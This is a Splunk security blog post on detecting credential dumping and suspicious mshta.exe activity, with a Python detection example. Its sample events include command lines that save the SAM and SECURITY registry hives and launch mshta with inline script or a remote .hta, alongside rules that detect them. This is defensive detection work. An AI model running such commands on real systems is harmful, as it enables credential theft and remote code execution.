Mount an Effective Defense Against Credential Dumping

Last month, in unveiling his new “get-tough-on-cybercrime” plan, Deputy Attorney General (DAG) Rod Rosenstein remarked that Russian interference in the 2016 election was not going to be a one-time issue; that it had been going on for years and was likely to get worse as technology evolves. Events this summer—such as reports of continued Russian election interference, Chinese cloud hacks, and the re-emergence of the Emotet malware—underscore the DAG’s point: the need for effective cyberdefense is increasing and the threats are becoming progressively more dangerous.

As always, the best way to keep your organization protected is to be proactive—study attack techniques and monitor for signs that bad actors are using these methods to compromise your environment. Because the Splunk Security Research Team’s goal is to make you look like the cyberdeity you are, we’ve included Analytic Stories in our August releases to monitor for two such attack techniques: credential dumping and suspicious MSHTA activities.

Find out more below and update your Splunk Enterprise Security Content Update app today!  

Preventing Credential Dumping

Credential dumping—obtaining hashed or clear-text passwords for nefarious purposes—is a tried-and-true attack technique that enables lateral movement, potentially providing bad actors with access to confidential information or an opportunity to install malware.

Regardless of the motivation, threat actors use a variety of sources and techniques to extract credentials, including the Security Accounts Manager (SAM), Local Security Authority (LSA) Secrets, the NTDS database on a domain controller, or Group Policy Preference (GPP) files.

A new detection search released in this month’s Analytic Story on credential dumping monitors for the process reg.exe with the "save" parameter, which specifies a binary export from the registry. In addition, it looks for the registry keys that contain the hashed credentials, which attackers may retrieve and use in brute-force attacks to recover legitimate credentials.

You can implement other precautions against credential dumping in your environment, as well: change default passwords, don’t share credentials with those who don’t require them (Principle of Least Privilege), consider limiting password access to specific machines/IP addresses, and implement MFA.

Stay Alert to Suspicious MSHTA Activity

Another common adversary tactic is to bypass application whitelisting solutions via the mshta.exe process, which executes Microsoft HTML applications with the .hta suffix. These applications work the same way as regular web applications, only outside of the browser. In these attacks, threat actors use the trusted Windows utility to proxy execution of malicious files, whether an .hta application, JavaScript, or VBScript.

One example of a notable mshta.exe attack was the Kovter malware, which has been implicated in both ransomware and click-fraud attacks. Kovter utilized .hta to execute a series of JavaScript commands, each progressively more dangerous. According to the MITRE Partnership Network, FIN7 has leveraged mshta.exe, as has the MuddyWater group, who used it to execute its POWERSTATS payload (which then used the utility to execute additional payloads).

It's important to note that .hta files are by no means the only file extension that bad actors may leverage when trying to obfuscate their presence in your environment. That said, MSHTA attacks remain a formidable threat.

An August ESCU release included an Analytic Story that can help you monitor for and detect techniques used by attackers who leverage the mshta.exe process to execute malicious code. We invite you to try it out and give us feedback, either via email or via the Feedback Center link in the ESCU App.
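To make the two detection ideas in this post concrete (the reg.exe "save" search from the credential dumping story, and monitoring of mshta.exe from the MSHTA story), here is an added, self-contained Python example. It is not Splunk's ESCU search content and does not use SPL; it parses constructed process-creation events in a simple key=value format (field names host, user, parent, image and cmdline are assumptions, roughly modeled on what a Sysmon Event ID 1 or Windows 4688 record provides) and applies two rules. The mshta indicators beyond the page's description (inline script protocol handlers, remote URLs, and an Office parent process) are this example's own assumptions, not a description of the ESCU search.

```python
import re
from dataclasses import dataclass

# Constructed sample process-creation events (not real telemetry). Each line
# carries the fields a SIEM would get from a Sysmon ID 1 / Windows 4688 record.
# Values containing spaces are double-quoted.
SAMPLE_EVENTS = r"""
host=ws01 user=CORP\alice parent=C:\Windows\explorer.exe image=C:\Windows\System32\reg.exe cmdline="reg.exe query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
host=ws01 user=CORP\alice parent=C:\Windows\System32\cmd.exe image=C:\Windows\System32\reg.exe cmdline="reg.exe save HKLM\SAM C:\Users\Public\sam.bak"
host=ws02 user=CORP\bob parent=C:\Windows\System32\cmd.exe image=C:\Windows\System32\reg.exe cmdline="reg save hklm\security C:\temp\sec"
host=ws03 user=CORP\carol parent=C:\Windows\explorer.exe image=C:\Windows\System32\mshta.exe cmdline="mshta.exe C:\Program Files\Vendor\help.hta"
host=ws03 user=CORP\carol parent="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" image=C:\Windows\System32\mshta.exe cmdline="mshta.exe javascript:<inline-script-placeholder>"
host=ws04 user=CORP\dave parent=C:\Windows\System32\cmd.exe image=C:\Windows\System32\mshta.exe cmdline="mshta http://example.invalid/update.hta"
"""

# key=value pairs; a value is either a double-quoted string or a run of non-spaces.
KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Registry hives that hold hashed or encrypted credential material (assumed list).
CRED_HIVES = {r"hklm\sam", r"hklm\security", r"hklm\system"}
# Heuristic mshta indicators used by this example (assumptions, see lead-in).
SCRIPT_PROTOCOLS = ("javascript:", "vbscript:")
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


@dataclass
class Finding:
    rule: str
    host: str
    user: str
    cmdline: str
    reason: str


def parse_events(text):
    """Turn key=value lines into dicts; quoted values keep their spaces."""
    events = []
    for line in text.strip().splitlines():
        if line.strip():
            events.append({k: q if q else u for k, q, u in KV.findall(line)})
    return events


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def detect_reg_save(ev):
    """reg.exe exporting a credential-bearing hive with the 'save' verb."""
    if _basename(ev.get("image", "")) != "reg.exe":
        return None
    args = ev.get("cmdline", "").lower().split()
    if len(args) < 3 or args[1] != "save":
        return None
    target = args[2].replace("hkey_local_machine", "hklm")
    if target not in CRED_HIVES:
        return None  # exporting an unrelated key is not what this rule is about
    return Finding("reg_save_credential_hive", ev["host"], ev.get("user", "?"),
                   ev["cmdline"], f"binary export of {target}")


def detect_suspicious_mshta(ev):
    """mshta.exe launched in a way that points at script proxy execution."""
    if _basename(ev.get("image", "")) != "mshta.exe":
        return None
    cmd = ev.get("cmdline", "").lower()
    parent = _basename(ev.get("parent", ""))
    reasons = []
    if any(p in cmd for p in SCRIPT_PROTOCOLS):
        reasons.append("inline script protocol handler in command line")
    if re.search(r"https?://", cmd):
        reasons.append("remote URL passed to mshta")
    if parent in OFFICE_PARENTS:
        reasons.append(f"spawned by Office application {parent}")
    if not reasons:
        return None  # a local .hta started from explorer.exe stays below the bar
    return Finding("suspicious_mshta", ev["host"], ev.get("user", "?"),
                   ev["cmdline"], "; ".join(reasons))


RULES = (detect_reg_save, detect_suspicious_mshta)


def run_detections(text):
    """Apply every rule to every event and return the findings in event order."""
    findings = []
    for ev in parse_events(text):
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in run_detections(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.host} {f.user}: {f.reason}\n    {f.cmdline}")
```

Of the six constructed events, four produce findings: the two reg.exe exports of the SAM and SECURITY hives, the mshta.exe launch from WINWORD.EXE with an inline script handler, and the mshta.exe launch that fetches a remote .hta. The reg.exe query and the locally installed vendor .hta started from explorer.exe are left alone, which is the kind of baseline a production search needs so that legitimate administrative and vendor use does not drown the alert.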

Install the Latest Version of ESCU

The Security Research group at Splunk sleeps better when we know that you're protected against the latest threats and vulnerabilities. So download the Splunk ESCU app today!


The Splunk Threat Research Team is an active part of a customer’s overall defense strategy, enhancing Splunk security offerings with verified research and security content such as use cases, detection searches, and playbooks. We help security teams around the globe strengthen operations by providing tactical guidance and insights to detect, investigate and respond to the latest threats. The Splunk Threat Research Team focuses on understanding how threats, actors, and vulnerabilities work, and the team replicates attacks, which are stored as datasets in the Attack Data repository.

Our goal is to provide security teams with research they can leverage in their day to day operations and to become the industry standard for SIEM detections. We are a team of industry-recognized experts who are encouraged to improve the security industry by sharing our work with the community via conference talks, open-sourcing projects, and writing white papers or blogs. You will also find us presenting our research at conferences such as Defcon, Blackhat, RSA, and many more.
